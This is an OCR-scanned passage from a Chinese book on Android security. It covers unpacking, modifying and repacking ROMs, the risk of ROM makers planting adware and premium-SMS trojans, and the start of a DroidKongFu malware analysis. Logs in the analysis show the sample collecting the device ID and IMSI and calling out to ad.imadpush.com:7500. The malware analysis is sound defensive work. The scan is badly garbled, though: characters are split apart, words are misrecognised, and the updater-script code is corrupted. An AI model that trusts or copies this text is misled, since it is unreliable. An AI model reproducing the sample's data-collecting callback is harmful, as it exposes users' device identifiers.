USB 数 据 线 连接 电脑 ， 通 过 电脑 上 的 刷机 软件 进行 刷机 ， 而 卡 刷 则 是 把 
ROM 或 者 升级 包 拷 贝 到 手机 SD 卡 中 进行 刷机 操作 。 线 刷 一 般 是 官方 所 采取 
的 刷机 方式 ， 如 果 出 现 手 机 故障 造成 无 法 开机 等 情况 ， 我 们 可 以 考虑 使 用 
线 刷 来 拯救 手机 。 

线 刷 一 般 需 要 使 用 单独 的 刷机 工具 ， 而 且 线 刷 使 用 的 ROM (以 下 简称 
为 线 刷 包 ) 与 卡 刷 的 zip 压 缩 包 有 所 不 同 。 比 如 ，Motorola 生 产 的 Android 手 
机 ， 线 刷 包 都 是 sdf 文 件 格 式 ， 要 想 解 包 这 类 ROM， 需 要 使 用 专门 针对 它 的 
解 包 工具 如 MotoAndroidDepacker 对 其 进行 解 包 。 图 11-19 为 笔者 使 用 
MotoAndroidDepacker 打 开 Moto XT615 一 个 sbf 刷 机 包 后 的 截图 。 


Notorola Android Firmware (De)packer by Skrilax CZ - Version 1.2 ALPHA 3 


Menu Advanced MBN  MOTOBLUR Help 
PLATFORM: P2K SUPERFILE - P2K 7 P2K05 


Üpening from file ... 
IL IFILE OPENED! ! ! 


Üpen From File 
= Start ^ 
Üpen Files o a End Address Descriptor Checksum Code 
T 
Split To Folder AM ETE 2D700000 2D7404FF | 0A00 DOEA 5COO 0000 0038 0403 0000 0000 | 655B 0000 
Compile File * 


00000000 l142E5F9F | 0000 0000 0000 0000 0138 0406 0000 0000 | 9194 Do08 


图 11-19 ”使 用 MotoAndroidDepacker 解 包 sbf 文 件 


点 击 界面 上 的 “Split To Folder” 按 钮 ，sbf 文 件 中 所 有 的 内 容 就 会 解 包 成 
多 个 单独 的 smg 文 件 ， 此 处 生成 的 CG2.smg 需 要 使 用 MotoAndroidDepacker 再 
解压 一 次 ， 才 能 得 到 最 终 的 mbn 文 件 ， 它 们 实质 上 都 是 yaffs 格 式 的 系统 镜像 
文件 ， 下 一 步 就 是 使 用 unyaffs 解 压 这 些 镜像 文件 ， 以 便 下 一 步 进 行 ROM 的 
修改 。 unyaffs 是 一 个 开源 的 工具 ， 项 目地 址 为 
http://code.google.com/p/unyaffso 

还 有 一 种 线 刷 包 ， 它 的 提供 方式 与 Android AVD 的 镜像 类 似 。 例 如 ， 三 
星 i9300 的 最 新 欧 版 线 刷 包 中 有 两 个 文件 : Odin3_v3.04.zip 与 
I9300XXDLH4_I93000XADLH4_I9300XXLH1_BTU.tar.md5， 前 者 是 线 刷 包 


软件 ， 后 者 是 线 刷 包 ， 笔 者 使 用 winRAR 打 开 线 刷 包 后 如 图 11-20 所 示 ， 一 
共 包 含 5 个 img 文 件 。 


$= I9300XXDLH4 193000XADLH4 19300XXLH1 BTU.tar.mdb 一 WinRAR 
文件 到 ) ATO IRO KERO AMN FHA 


IFITL IM 
LJ 
解压 到 查看 查找 向 信息 BSAS 


图 | b resooxxpLs4 193000XADLH4 I9300XXLHi BTW. tar. md5 - TAR 压缩 文件 ， 解 包 大 小 为 1, 238, 390, 740 FP 


mW e 大 小 压缩 后 大 小 ”类 型 修改 时 间 CRC32 
boot. img 8,988,608 8,388,608 IMG 文件 - 2012-8-1T 1l... i 
(f moden. bin 12, 583, 168 12,583,168 BIN 文件 2012-8-4 11:49 

Ef recovery. img 5, 652, T36 5,652,736 IMG Xt 2012-7-26 1. 


v 


1,211, 606 mG 文件 2012-8-17 2. 


Ej system. img 1, 211, 60 
atz img 159, 744 159,744 IMG XPF 2011-6-23 1:25 


总 计 1,238, 390,740 FPG 个 文件 ) 


图 11-20 i9300 线 刷 包 


接 下 来 的 工作 就 是 将 这 些 img 文 件 使 用 unyaffs 解 压 出 来 ， 以 便 下 一 步 进 
行 ROM 的 修改 。 

比 起 线 刷 ， 卡 刷 方 式 更 简便 ， 而 且 卡 刷 使 用 的 ROM (以 下 简称 为 卡 刷 
包 ) 只 是 一 个 普通 的 zip 压 缩 包 ， 里 面 的 任何 文件 都 可 以 单独 提取 出 来 修 
改 。 以 i9100 最 新 的 CM10 为 例 ， 使 用 WinRAR 打 开 卡 刷 包 后 如 图 11-21 所 示 ， 
线 刷 包 包 含 一 个 boot.img 文 件 与 两 个 目录 ，META-INF 目 录 下 存放 的 是 线 刷 
包 的 签名 与 刷机 脚本 ，system 目 录 存 放 的 是 需要 刷 入 手机 的 文件 ， 对 于 完整 
的 刷机 包 ， 它 里 面 直 接 对 应 手机 刷机 后 的 system 目 录 内 容 ， 对 于 更 新 包 或 服 
务 包 ， 它 里 面 存放 的 只 是 需要 更 新 的 系统 文件 。 


i— cm-10-20121014-NIGHTLY-i9100. zip — WinRAR 
XE eco & 收藏 夹 @) 选项 如 帮助 出) 


m 


an 


e oo ò a RS 


解压 到 | p 查看 删除 查找 信息 扫描 病毒 4 BRE fü 
[SS cn-10-20121014-NIGHTLY-i9100. zip ~ ZIP 压缩 文件 ， 解 包 大 小 为 247, 634, 117 FP 


= p 

()META-INF 

C system 

[f$ boot. img 4, 535, 376 4,535,018 IMG 文件 


E X | 大小。 压缩 后 大 小 类 型 。” Fiened by Sienhpk 


总 计 2 xtX 和 4 536, 376 FPU 个 文件 ) 
图 11-21 ”i9100 的 CM10 线 刷 包 


ROM 修 改 


根据 修改 ROM 的 作用 与 难度 不 同 ， 其 修改 的 内 容 也 不 一 样 。 首 先是 线 
刷 包 的 修改 ， 很 多 手机 厂商 的 线 刷 包 都 是 自 定义 的 文件 格式 ， 经 过 相应 的 
解 包 工具 提取 出 线 刷 包 中 的 内 容 后 ， 就 可 以 对 其 进行 修改 了 ， 例如， 优化 
版 的 ROM 通 单 要 做 的 事情 包含 : 


1. 


ROM 集 成 驱动 更 新 


2. 内 核 优 化 
3. 组 件 精 总 
4. 
5 
6 


系统 bug 修 正 


.加 入 root 权 限 
.系统 功能 增强 


美化 版 的 ROM 通 常 要 做 的 事件 包含 : 


1. 
2. 


系统 框架 资源 修改 
组 件 精 减 


3. 开关 机 动画 修改 


4. 铃声 修改 
.系统 功能 增强 〈 可 无 ) 

a e E 操作 时 可 能 涉及 到 修改 或 
蔡 换 系统 底层 文件 ， 例 如 : 手机 基带 、Wi-Fi 驱 动 、 摄 像 头 驱动 等 ， 还 有 可 
能 涉及 到 系统 配置 文件 ， 例 如 : init.rc、/system/build.prop 等 ， 像 CM 这 类 专 
业 的 ROM 还 会 加 入 很 多 增强 的 功能 ， 例 如 : DSP 音 效 增强 、 系 统 主题 增 
强 、 隐 私 保 护 增 强 等 。 

美化 版 的 ROM 修 改 起 来 相对 简单 ， 通 常情 况 下 ， 主 要 的 工作 是 修改 
framework-res.apk 里 面 的 资源 文件 ， 例 如 : 修改 系统 所 有 的 UI 图 标 、 桌面 背 
景 、 界 面 文字 等 。 当 然 ， 也 可 以 加 入 优化 版 ROM 中 相应 的 功能 。 

比 起 线 刷 包 ， 卡 刷 包 的 优化 与 美化 是 最 简单 的 。 因 为 卡 刷 包 里 面 的 任 
何 一 个 文件 都 可 以 单独 提取 出 来 进行 修改 ， 而 且 针 对 CM 卡 刷 包 的 加 工 ， 可 
以 直接 对 其 进行 源码 级 修改 。 卡 刷 包 的 修改 比 线 刷 包 的 修改 多 一 个 步骤 ， 
那 就 是 编写 刷机 脚本 。 刷 机 脚本 只 是 一 个 文本 文件 ， 通 常 该 文件 命名 为 
updater-script， 位 于 卡 刷 包 的 META-INF\com\google\android 目 录 。 以 三 星 
i9100 的 CM10 卡 刷 包 为 例 ， 它 的 updater-script 文 件 内 容 如 下 。 


assert (getprop("ro.product.device") == "galaxys2" ||getprop("ro.build.product") 


== "galaxys2" || 
getprop("ro.product.device") == "19100" || getprop("ro.build.product") 
== "i9100" || 
getprop("ro.product.device") == "GT-I9100" || getprop("ro.build.product") 
-- "GT-I9100" || 
getprop("ro.product.device") -- "GT-I9100M" || getprop("ro.build.product") 
== "GT-I9100M" | | 
getprop("ro.product.device") -- "GT-I9100P" || getprop("ro.build.product") 
== "GT-I9100P" || 
getprop("ro.product.device") -- "GT-I9100T" || getprop("ro.build.product") 
== "GT-I9100T"); 

mount("ext4", "EMMC", "/dev/block/mmcblkO0p9", "/system"); 

package extract file("system/bin/backuptool.sh", "/tmp/backuptool.sh"); 


package extract file("system/bin/backuptool.functions", 
"/tmp/backuptool.functions"); 

set perm(0, 0, 0777, "/tmp/backuptool.sh"); 

set perm(0, 0, 0644, "/tmp/backuptool.functions"); 

run program("/tmp/backuptool.sh", "backup"); 

unmount ("/system"); 

show progress(0.500000, 0); 

unmount("/system"); 


format("ext4", "EMMC", "/dev/block/mmcblk0O0p9", "0", "/system"); 
mount("ext4", "EMMC", "/dev/block/mmcblk0O0p9", "/system"); 
package extract dir("recovery", "/system"); 

package extract dir("system", "/system"); 


symlink("Roboto-Bold.ttf", "/system/fonts/DroidSans-Bold.ttf"); 

symlink("Roboto-Regular.ttf", "/system/fonts/DroidSans.ttf"); 

symlink("busybox", "/system/xbin/[", "/system/xbin/[[", 
"/system/xbin/adjtimex", "/system/xbin/arp", "/system/xbin/ash", 


"/system/xbin/awk", "/system/xbin/base64", "/system/xbin/basename", 
"/system/xbin/xz", "/system/xbin/xzcat", "/system/xbin/yes", 
"/system/xbin/zcat"); 

symlink("mksh", "/system/bin/sh"); 

symlink("toolbox", "/system/bin/cat", "/system/bin/chmod", 
"/system/bin/chown", "/system/bin/cmp", "/system/bin/date", 
"/system/bin/uptime", "/system/bin/vmstat", "/system/bin/watchprops", 
"/system/bin/wipe"); 

set perm recursive(0, 0, 0755, 0644, "/system"); 

set perm recursive(0, 0, 0755, 0755, "/system/addon.d"); 

set perm(0, 0, 06755, "/system/xbin/procrank"); 

set perm(0, 0, 06755, "/system/xbin/su"); 

show progress(0.200000, 0); 

show progress(0.200000, 10); 

package extract file("system/bin/backuptool.sh", "/tmp/backuptool.sh"); 

package extract file("system/bin/backuptool.functions", 

"/tmp/backuptool.functions"); 

set perm(0, 0, 0777, "/tmp/backuptool.sh"); 

set perm(0, 0, 0644, "/tmp/backuptool.functions"); 

run, program("/tmp/backuptool.sh", "restore"); 

delete("/system/bin/backuptool.sh"); 

delete("/system/bin/backuptool.functions"); 

show progress(0.200000, 10); 

assert(package extract file("boot.img", "/tmp/boot.img"), 

write raw image("/tmp/boot.img", "/dev/block/mmcblk0p5"), 
delete("/tmp/boot.img")); 
show progress(0.100000, 0); 


unmount (" /system") ; 
该 刷机 脚本 的 工作 包含 : 
assert():. 检查 手机 的 版 本 
mount(): 加 载 系统 
package_extract_file() 释 放 备 份 工 具 上 脚本 
set perm(): 赋予 备份 工具 脚本 执行 权限 
run program(): 执行 备份 操作 
unmount(): £2 2&4 

irn 


show progress): 显示 进度 条 


format(): 格式 化 系统 分 区 

mount(): 加 载 系 统 

package extract dir(): 释放 刷机 包 

symlink(): 创建 软 链接 

set perm recursive()5Eset perm (): 设置 文件 与 目录 权限 

package extract, file() Erun. program(): 还 原 备份 

write raw. image(): 写 boot 分 区 

unmount): ERAR 

从 上 面 的 命令 序列 可 以 看 出 ， 整 个 卡 刷 的 过 程 就 是 一 个 执行 格式 化 系 
统 、 拷 贝 文件 、 设 置 权限 的 过 程 。 

。 ROM 打 包 

当 ROM 修 改 完成 ， 最 后 一 步 就 是 打包 修改 后 的 文件 为 刷机 包 了 。 首 先 
是 卡 刷 包 ， 通 常 是 使 用 专门 针对 广 商 ROM 的 工具 进行 打包 ， 在 打包 前 ， 需 
要 先 将 修改 的 文件 做 成 yaffs 镜 像 ， 可 以 使 用 mkyaffs2image 工 具 来 完成 ， 该 
工具 位 于 Android 系 统 源 码 中 ， 成 功 编译 系统 源码 后 可 以 
T£ /media/source/android4.0/out/host/linux-x86/bin 目录 下 找到 它 的 可 执行 文 
件 ， 在 终端 提示 符 下 执行 以 下 命令 即 可 打包 当前 system 目 录 下 所 有 的 文件 为 
system.imgo 

./mkyaffs2image system system.img 

线 刷 包 的 打包 更 简单 ， 可 以 直接 通过 解压 缩 软件 导入 导出 线 刷 包 里 面 
的 文件 。 

最 后 就 是 签名 了 ， 线 刷 包 使 用 专门 针对 厂商 ROM 的 工具 进行 签名 ， 而 
卡 刷 包 的 签名 方法 与 apk 文 件 签名 方法 一 样 ， 使 用 signapk.jar 就 可 以 完成 。 


11.6.3 ”定制 ROM 的 安全 隐患 
ROM 的 安全 问题 一 直 没 有 受到 重视 ， 直 到 2011 年 底 ，CIQ 病 毒 事件 的 


发 生 ， 才 使 得 ROM 的 安全 问题 首次 通过 媒体 报道 出 来 ， 是 因为 市 场 上 没有 
CIQ 这 类 的 病毒 吗 ?” 很 显示 不 是 。 笔 者 认为 极 大 可 能 的 原因 是 产业 利益 在 作 


深 ， 都 不 愿意 公开 这 不 为 人 知 的 内 幕 。 关 于 CIQ 的 详细 介绍 与 分 析 ， 笔 者 在 
此 就 不 展开 了 ， 有 兴趣 的 读者 可 以 访问 安 天 实验 室 的 网 站 来 查看 其 分 析 
告 o 网 址 是 
http://www.antiy.com/cn/security/2011/analysis of carrieriq.htmo 

现 如今 ， 网 上 流传 的 民间 个 人 版 ROM 已 经 和 当初 仅 作 为 技术 交流 的 性 
质 发 生 了 根本 的 不 同 。 如 图 11-22 所 示 ， 民 间 个 人 版 ROM 已 经 成 为 了 广告 软 
件 与 非法 SP (Service Provider) 生存 的 又 一 个 寄宿 点 ， 广 告 软件 与 非法 SP 
直接 与 ROM 制 作者 勾结 ， 在 ROM 中 植 入 广告 软件 或 暗 扣 软 件 ， 这 样 当 用 户 
下 载 并 刷 入 该 ROM 后 ， 就 会 面临 手机 话费 莫 明 奇妙 减少 、 广 告 软件 越 来 越 


多 的 危险 。 
[e 
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图 11-22 ”民间 个 人 版 ROM 的 黑色 产业 链 


在 上 一 小 节 中 ， 我 们 看 到 了 民间 个 人 版 ROM 的 制作 过 程 ， 从 这 个 过 程 
中 可 以 看 出 ， 修 改 者 完全 可 以 神 不 知 、 鬼 不 觉 地 向 ROM 中 添加 任何 自己 要 
想 加 入 的 “功能 ”。 随 着 ROM 制 作 技术 的 越 来 越 完 善 ，ROM 中 植 入 广告 与 木 
马 的 手段 也 越 来 越 高 有 明了。 初级 的 作法 是 将 广告 软件 植 入 系统 后 ， 使 用 论 
坛 活动 或 其 它 方式 诱骗 用 户 下 载 安 装 ， 而 高 级 的 作法 就 不 是 这 么 简单 了 ， 
它们 会 更 改 系 统 源 码 、 修 改 系统 组 件 、 添 加 恶意 插件 ， 例 如 修改 电话 与 短 
信和 模块 的 源码 ， 直 接 在 系统 底层 处 理 SP 暗 扣 短 信 。 面 对 这 种 修改 过 的 
ROM, 一般 用 户 基本 上 是 无 法 察觉 出 ROM 的 问题 的 ， 即 使 是 专业 的 技术 人 
员 也 不 可 能 短 时 间 内 找 出 问题 所 在 。 现 在 唯一 要 做 的 就 是 按 下 键盘 上 的 
SHIFT+DEL， 将 其 清理 出 电脑 。 


11.6.4 ”如 何 防范 


关于 防范 ， 笔 者 提出 以 下 几 点 意见 : 

1. 使 用 官方 ROM 

官方 的 ROM 尽 管 存 在 着 各 种 问题 ， 但 安全 性 是 最 有 保障 的 。 笔 者 建议 
用 户 可 以 购买 Android 系 统 源 码 支持 比较 好 的 手机 ， 例 如 Google 公 司 自己 出 
品 的 手机 ， 需 要 刷机 时 只 需要 自己 动手 编译 Android 源 码 即 可 。 

2. 使 用 权威 团队 制作 的 ROM 

权威 团队 无 论 是 质量 上 ， 还 是 安全 性 上 都 是 比较 有 保障 的 ， 读 者 可 以 
酌情 的 选择 国内 外 优秀 的 ROM 作 为 自己 爱 机 的 系统 。 而 对 于 那些 民间 个 人 
版 的 ROM， 最 好 是 不 要 使 用 ， 以 免 造成 不 必要 的 经 济 损失 。 

3. 自动 动手 ， 丰 衣 足 食 

从 11.6.2 小 节 的 内 容 中 来 看 ， 动 手 制作 一 个 属于 自己 的 ROM 并 不 是 太 难 
(并 非 绝 对 ， 与 手机 型 号 本 身 也 有 一 点 关系 ) ， 如 果 自 己 的 手机 有 幸 在 CM 
团队 的 支持 之 列 ， 可 以 选择 在 CM 团队 制作 的 ROM 基 础 上 进行 修改 ， 反 之 ， 
只 能 自己 动手 制作 了 。 


11.7 ”本章 小 结 


本 章 主要 从 不 同 的 角度 介绍 了 Android 系 统 中 存在 的 安全 问题 。 希 望 读 
者 在 阅读 完 本 章 后 ， 对 Android 系 统 的 安全 有 一 个 全 新 的 认识 。 


第 12 章 ”DroidKongFu 变 种 病毒 实例 
分 析 


2012 是 Android 系 统 快 速 发 展 的 一 年 ， 同 样 也 是 Android 手 机 病毒 猩 狐 的 
=E] 

Android 系 统 由 于 其 开放 性 ， 得 到 了 广大 用 户 与 开发 人 员 的 青睐 ， 与 此 
同时 ， 也 来 了 很 多 软件 安全 方面 的 问题 。 用 户 可 以 在 网 上 随意 下 载 喜 欢 的 
Android 软 件 与 游戏 ， 然 而 非法 Android 市 场 上 的 特殊 版 软件 、 手 机 论坛 中 的 
破解 版 游戏 ， 都 是 手机 病毒 传播 的 主要 场所 。 普 通用 户 很 难 辨别 下 载 的 软 
件 是 否 为 恶意 的 病毒 程序 ， 一 旦 用 户 手 机 不 小 心安 装 了 它们 ， 就 会 面临 着 
个 人 隐私 被 泄漏 、 手 机 系统 遭 破 坏 、 话 费 无 故 “ 失 踪 ” 等 危险 。 


地 理解 Android 系 统 安全 ， 做 到 防 患 于 未 然 。 
12.1 DroidKongFu 病 毒 介绍 


DroidKongFu 是 Android 平 台 上 一 款 十 分 活跃 的 病毒 。 早 在 2011 年 ， 这 
款 病毒 就 出 现 了 ， 这 款 病 毒 曾 经 被 一 次 次 被 上 曝光， 但 病毒 的 作者 非但 没有 
停止 开发 ， 反 而 变本加厉 ， 一 次 次 升级 病毒 程序 ， 破 坏 性 也 由 原先 的 下 载 
恶意 广告 软件 到 现在 的 自 改 手机 系统 ， 其 性 质 恶 劣 可 见 一 斑 。 

DroidKongFu 病 毒 的 主体 是 一 个 Android 原 生 程 序 ， 通 常 它 被 捆绑 到 正 
党 的 Android 软 件 中 ， 用 户 只 要 安装 遭 到 捆绑 的 软件 就 会 感染 该 病毒 。 本 章 
分 析 的 病毒 样本 为 DroidKongFu 病 毒 的 最 新 升级 版 ， 该 病毒 捆绑 在 一 款 名 为 
“Cut The Rope Unlock” 的 游戏 解锁 软件 中 ， 软 件 信息 如 图 12-1 所 示 (图 中 的 


APK 安 装 器 是 笔者 使 用 C++ 语言 编写 的 一 款 安装 Android 软 件 的 小 程序 ， 本 
书 配套 源 代码 中 提供 了 该 工具 的 可 执行 文件 及 源码 ) 。 


E APK 安 装 器 v1.1.2 


软件 名 称 : Cut The Rope Unlock 
软件 包 名 : com.tebs3.cuttherope 
软件 版 本 : 115 

系统 要 求 : Android 1.6 


文件 大 小 : ”88.2KB 


选择 APK 立 件 安装 路 径 : 


软件 权限 : Æ 


软件 已 就 绪 ， 点击" 安装 "按钮 进行 安装 ,，… 


中 安装 前 先 扼 载 旧 版 本 关联 本 程序 


图 12-1 ”DroidKongFu 变 种 病毒 程序 
当 用 户 安 装 游戏 解锁 软件 并 运行 后 ， 软 件 中 被 植 入 的 Java 代 码 就 会 执行 
Native 层 的 病毒 主体 ， 病 毒 主 体 进而 感染 手机 系统 、 自 改 系统 文件 ， 连 接 远 
程 的 C&C (Command & Control ， 远 程 命令 与 控制 ) 服务 器 并 接受 控制 指 


4 
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警告 
DroidKongFu 变 种 病毒 样本 在 本 书 配 套 源 代码 中 以 加 密 压缩 包 的 形式 提供 ， 解 压 密码 为 “virus”。 
该 病毒 样本 具有 系统 破坏 性 ， 读 者 切 勿 在 手机 中 安装 运行 ， 否 则 ， 带 来 的 一 切 后 果 由 读者 自行 承 


担 。 


12.2 ”配置 病毒 分 析 环 境 


本 章 分 析 DroidKongFu 变 种 病毒 时 用 到 以 下 工具 : 

e Ubuntu: 本 章 采 用 32 位 的 Ubuntu 12.04 作 为 分 析 病 毒 时 使 用 的 操作 
系统 。 

e Android SDK: Android 软 件 开 发 必 备 。 本 章 主要 使 用 其 中 的 DDMS 
查看 日 志 输 出 ， 使 用 Emulator 运 行 Android 模 拟 器 。 

e ApkTool、dex2jar、jd-gui: 反 编译 工具 集 。 前 面 曾 多 次 使 用 过 。 

e DroidBox: Android 程 序 动态 分 析 工 具 。 

e APIMonitor: DroidBox 中 提供 的 另 一 款 Android 程 序 动态 分 析 工 具 。 

e IDA Pro: 静态 分 析 病 毒 Native 代 码 。 

e Bless Hex Editor: 十 六 进 制 编辑 工具 。 查 看 与 编辑 Android 原 生 程 
序 。 

DroidBox 是 一 款 开源 的 Android 程 序 动态 分 析 工 具 。 它 能 够 对 Android 程 
序 进行 监控 分 析 ， 监 控 的 内 容 包 括 : 

分 析 程 序 包 的 Hash 值 。 

进出 的 网 络 数据 。 

文件 读 写 操作 。 

使 用 DexClassLoader 启 动 的 服务 与 类 。 

言 息 泄 漏 ， 包 括 网 络 、 文 件 与 短 消息 。 

危险 的 应 用 程序 权限 。 

被 调用 的 Android 加 密 类 API。 

列举 所 有 的 广播 接收 者 。 

发 出 的 短 消息 与 通话 记录 。 

分 析 病 毒 时 使 用 的 操作 系统 是 依照 DroidBox 的 运行 平台 来 选择 的 ， 
DroidBox 依赖 2.7 版 的 Python Ubuntu 10.04 自 带 的 Python 2.6 无 法 满足 要 
求 ， 因 此 笔者 选择 了 Ubuntu 12.04 作 为 DroidBox 的 运行 环境 。DroidBox 的 安 
装 比 较 简 单 。 首 先 到 http://code.google.com/p/droidbox F &k DroidBox 软件 
包 ， 目 前 最 新 的 版 本 为 Android 2.3 Beta， 文 件 名 为 DroidBox23.tar.gz， 下 载 
后 将 其 解压 到 任意 目录 ， 然 后 在 终端 提示 符 下 执行 以 下 命令 安装 DroidBox 
运行 所 需要 的 依赖 软件 包 。 


sudo apt-get install python-numpy python-scipy python-matplotlib 

依赖 软件 包 安 装 完成 后 ，DroidBox 就 算 配置 好 了 。 

APIMonitor 是 A 一 款 独 立 的 动态 分 析 工 具 ， 需 要 从 
http://code.google.com/p/droidbox/ 单 独 下 载 。 目 前 最 新 版 本 为 beta2， 文 件 名 
为 APIMonitor-beta2.targz。 按 照 上 面 的 步骤 安装 好 DroidBox 运 行 环 境 后 ， 
APIMonitor 就 不 需要 做 其 它 配置 工作 了 ， 下 载 解压 后 即 可 直接 使 用 。 

IDA Pro 可 以 使 用 官方 提供 的 6.2 演 示 版 或 购买 商业 版 ， 使 用 演示 版 的 不 
足 是 无 法 保存 分 析 后 的 idb 数 据 库 文件 。 

Bless Hex Editor 是 Linux 平 台 一 款 十 六 进 制 编辑 工具 ， 本 章 在 提取 分 析 
DroidKongFu 病 毒 的 核心 程序 时 使 用 到 它 。 它 的 安装 方法 很 简单 : 打开 
Ubuntu 软 件 中 心 ， 搜 索 “Bless Hex Editor” 后 直接 点 击 安装 即 可 。 


12.3 ”病毒 执行 状态 分 析 


病毒 分 析 讲 究 先 动 后 静 的 分 析 步 骤 。 首 先 ， 使 用 动态 分 析 捕 获 病毒 执 
行 的 所 有 敏感 操作 ， 观 察 病毒 运行 时 的 症状 ， 在 了 解 病 毒 实现 的 “功能 ” 
后 ， 再 使 用 静态 分 析 技 术 逆 向 病毒 的 功能 代码 ， 理 清 病 毒 的 执行 路 线 ， 最 
终 理解 病毒 实现 的 全 过 程 。 


12.3.1 ”使 用 APIMonitor 初 步 分 析 


APIMonitor 是 新 版 DroidBox 加 入 的 工具 ， 它 的 原理 是 向 目标 apk 文 件 中 
插入 桩 代码 ， 实 现 对 特定 API 的 监控 。 使 用 它 的 好 处 是 重新 打包 后 的 程序 可 
以 在 Android 设 备 或 模拟 器 中 直接 运行 ， 分析 人 员 只 需要 查看 Tag 标 记 为 
“DroidBox” 的 日 志 信 息 即 可 。 

将 解压 后 的 virus.apk 放 到 APIMonitor 工 具 的 目录 下 ， 然 后 在 终端 提示 符 
下 进入 该 目录 执行 命令 : 

./apimonitor.py ./virus.apk 


会 输出 如 下 信息 : 


./apimonitor.py ./virus.apk 

min, sdk version-4 

target sdk version-4 

Parsing ./apimonitor out/origin smali... 

Done! 

Loading and processing API database... 

Target API Level: 4 

[Warn] Inferred API: Landroid/content/Context;-»sendBroadcast 

[Warn] Method not found in API-4 db: Landroid/content/ContextWrapper; 
-»sendStickyOrderedBroadcast 

[Warn] Method not found in API-4 db: 

Landroid/content/ContextWrapper;-»startActivities 

[Warn] Inferred API: Ljava/io/Writer;--append 

Done! 

Injecting... 

Done! 

Saving ./apimonitor out/new smali... 

Done 

NEW APK: ./virus new.apk 


打包 完成 会 生成 virus_new.apk 文 件 ， 现 在 只 需要 安装 这 个 apk 然 后 运行 
即 可 。 在 终端 提示 符 下 执行 命令 “emulator -avd android2.3.3” 启 动 模拟 器 OF 
者 可 根据 实际 情况 启动 自己 设置 的 模拟 器 ) ， 然 后 执行 以 下 命令 安装 打包 
后 的 DroidKongFu 病 毒 样本 : 

adb install ./virus new.apk 

安装 完成 后 点 击 模拟 器 上 的 “Cut The Rope Unlock” 图 标 ， 运 行 病毒 样 
本 ， 然 后 打开 DDMS ， 添 加 Tag 标 签 为 "DroidBox” 的 监视 过 滤器 ， 输 出 的 信 
息 如 图 12-2 所 示 。 


Dalvik Debug Monitor 


QÓ G3 EXE: 9 Info | Threads | VM Heap | Allocation Tracker | Sysinfo | Network |? 


Name 


<ormoarrororoncrronm 


DDM-aware? yes 
App description: com.tebs3.cuttherope 
com.android.launcher VM version: Dalvik v1.4.0 
androld.process.media ProcessID: 361 
com.android.music ; [Supports Profiling Control: Yes 


com.tebs3.cuttherope 5 Supports HPROF Control: Yes 


Saved Filters 十 一 |verbose 二 | H4 & Im 4 
All mes filt rp 

messages (non Le PID Application Tag Text 
DroldBox “一 = Wen eere rere enr er epe c sr rn ijt wur re cr ree p x prn sor nr Caen n jx J oc uc nre 


y.luni.internal.net.www.protocol.http.Htt 
push.com: 7580/AppManager /index.php/user/r 
V,361  com.Lebs3.cuLLherope DroidBux  Ljava/net/URL; -»«init»(Ljava/lang/string; 
anager/index.php/user/regiscer/register)v 
V | 361 com.tebs3.cuttherope DroidBox Ljava/net/URL;->openConnection()Ljava/net 
y.luni.internal.net.www.prorocol.http.Htt 
push.com: 7500/AppManager/index.php/user/r 
V | 361 com.tebs3.cuttherope DroidBox  Ljava/net/URL;-»«init»(Ljava/lang/String; 
anager/index.php/AppPoster/mgPush/getPusF 
V 361 com.tebs3.cuttherope DroidBox  Ljava/net/URL;-»openConnection()Ljava/ne 
y.luni.internal.net.www.prorocol.http.Ht 
push.com: 7500/AppManager/index.php/AppPo 


图 12-2 ”使 用 APIMonitor 动 态 分 析 程 序 


为 了 方便 读者 查看 其 输出 内 容 ， 笔 者 使 用 命令 行 方式 来 列 出 Tag 标 签 为 
“DroidBox” 的 日 志 人 信息， 执行“adb logcat -s DroidBox:V” 后 结果 输出 信息 如 
下 (为 了 便于 排版 ， 笔 者 删除 了 每 行 信息 开头 的 字符 串 
*V/DroidBox(361):;") : 


adb logcat -s DroidBox:V 

Landroid/telephony/TelephonyManager;- -»getDeviceId()Ljava/lang/String;-000 
000000000000 
Landroid/telephony/TelephonyManager;-»getSubscriberId()Ljava/lang/String; 
-310260000000000 
Landroid/telephony/TelephonyManager;-»getDeviceId()Ljava/lang/String;-000 
000000000000 
Landroid/telephony/TelephonyManager;-»getSubscriberId()Ljava/lang/String; 
-310260000000000 
Landroid/telephony/TelephonyManager;-»getDeviceId()Ljava/lang/String;-000 
000000000000 
Landroid/telephony/TelephonyManager;-»getSubscriberId()Ljava/lang/String; 
-310260000000000 
Ljava/security/MessageDigest;-»getInstance(Ljava/lang/String;-MD5)Ljava/s 
ecurity/MessageDigest; -MESSAGE DIGEST MD5 
Ljava/security/MessageDigest;-»update([B-(48, 48, 48, 48, 48, 48, 48, 48, 48, 
48, 48, 48, 48, 48, 48))V 
Ljava/security/MessageDigest;-»digest() [B={82, -124, 4, 127, 79, -5, 78, 4, -126, 
74, 47, -47, -47, -16, -51, 98} 
Landroid/telephony/TelephonyManager;-»getDeviceId()Ljava/lang/String;-000 
000000000000 
Landroid/telephony/TelephonyManager;-»getSubscriberId()Ljava/lang/String; 
-310260000000000 
Landroid/telephony/TelephonyManager;-»getDeviceId()Ljava/lang/String;-000 
000000000000 
Landroid/telephony/TelephonyManager;-»getSubscriberlId()Ljava/lang/String; 
-310260000000000 
Landroid/telephony/TelephonyManager;-»getDeviceId()Ljava/lang/String;-000 
000000000000 
Landroid/telephony/TelephonyManager;-»getSubscriberId()Ljava/lang/String; 
-310260000000000 

Landroid/content/Intent;-»«init» (Landroid/content/Context;-com.tebs3.cutt 
herope.MainActivity8405178c0 | Ljava/lang/Class;-class 
ad.imadpush.com.poster.ReceiverAlarm)V 
Landroid/content/Intent;-»«init»()V 
Landroid/content/Intent;-»-«init»(Landroid/content/Context;-android.app.Re 
ceiverRestrictedContext84055c978 | Ljava/lang/Class;-class 
ad.imadpush.com.poster.AlarmService)V 


Landroid/telephony/TelephonyManager;-»getDeviceId()Ljava/lang/String;-000 
000000000000 
Ljava/net/URL;-»«init»(Ljava/lang/String;-http://ad.imadpush.com:7500/App 
Manager/index.php/user/register/register)V 
Landroid/telephony/TelephonyManager;-»getDeviceId()Ljava/lang/String;-000 
000000000000 
Ljava/net/URL;-»openConnection()Ljava/net/URLConnection;-org.apache.harmo 
ny.luni.internal.net.www.protocol.http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/user/register/register 
Ljava/net/URL;-»«init»(Ljava/lang/String;-http://ad.imadpush.com:7500/App 
Manager/index.php/user/register/register)V 
Ljava/net/URL;-»openConnection()Ljava/net/URLConnection;-org.apache.harmo 
ny.luni.internal.net.www.protocol.http.HttpURLConnectionimpl:http://ad.im 
